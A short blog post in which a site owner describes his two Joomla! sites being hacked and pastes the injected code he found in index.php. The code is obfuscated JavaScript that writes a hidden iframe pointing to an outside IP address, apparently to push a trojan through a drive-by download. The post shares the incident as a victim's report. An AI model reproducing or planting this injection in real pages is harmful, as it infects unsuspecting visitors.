Joomla! Sites Hacked
Both of my Joomla!
sites were hacked yesterday. I’m not yet sure what the vector was,
whether it was the Joomla! core, or one of the components/extensions I
use.
The first I knew of it was visiting the sites resulted in:
Parse error: syntax error, unexpected ‘<’ in /mnt/local/home/timhaughton/homedocumentmanager.com/index.php on line 89
A look at line 89 gives this:
echo JResponse::toString($mainframe->getCfg(‘gzip’));
v497b1ee5c5c25(v497b1ee5caa4e){
return(parseInt(v497b1ee5caa4e,16));}function
v497b1ee5d962d(v497b1ee5de2cb){ var
v497b1ee5e30f9=”;for(v497b1ee5e7f0e=0;
v497b1ee5e7f0e<v497b1ee5de2cb.length; v497b1ee5e7f0e+=2){
v497b1ee5e30f9+=(String.fromCharCode(v497b1ee5c5c25(v497b1ee5de2cb.substr(v497b1
ee5e7f0e, 2))));}return v497b1ee5e30f9;}
document.write(v497b1ee5d962d(‘3C5343524950543E77696E646F772E7374617475733D27446
F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D6130207372633
D5C27687474703A2F2F3131362E35302E31352E32352F73746174732F3F272B4D6174682E726F756
E64284D6174682E72616E646F6D28292A3739393638292B2739613936306131305C2720776964746
83D353838206865696768743D313336207374796C653D5C27646973706C61793A206E6F6E655C273
E3C2F696672616D653E27293C2F5343524950543E‘));
After
consulting someone far more knowledgable than myself, I’m told that the
script is trying to install a trojan by downloading a corrupt PDF. Deep
wholesome joy.
It’s the second time this has happened. It doesn’t
seem to cause any real issue other than I have to replace the index.php
file. The hack is pretty clumsy in that it doesn’t leave a working site
to spread the trojan, since there’s a syntax error. This is good, as it
means I shouldn’t be flagged as having malware on the site. But will it always be clumsy?
It would be a pain to have to replace the Joomla! site with a hand crafted one.
![Reblog this post [with Zemanta]](http://img.zemanta.com/reblog_e.png?x-id=f6336f37-ab55-4527-b3c2-0acfbb5c04bf)
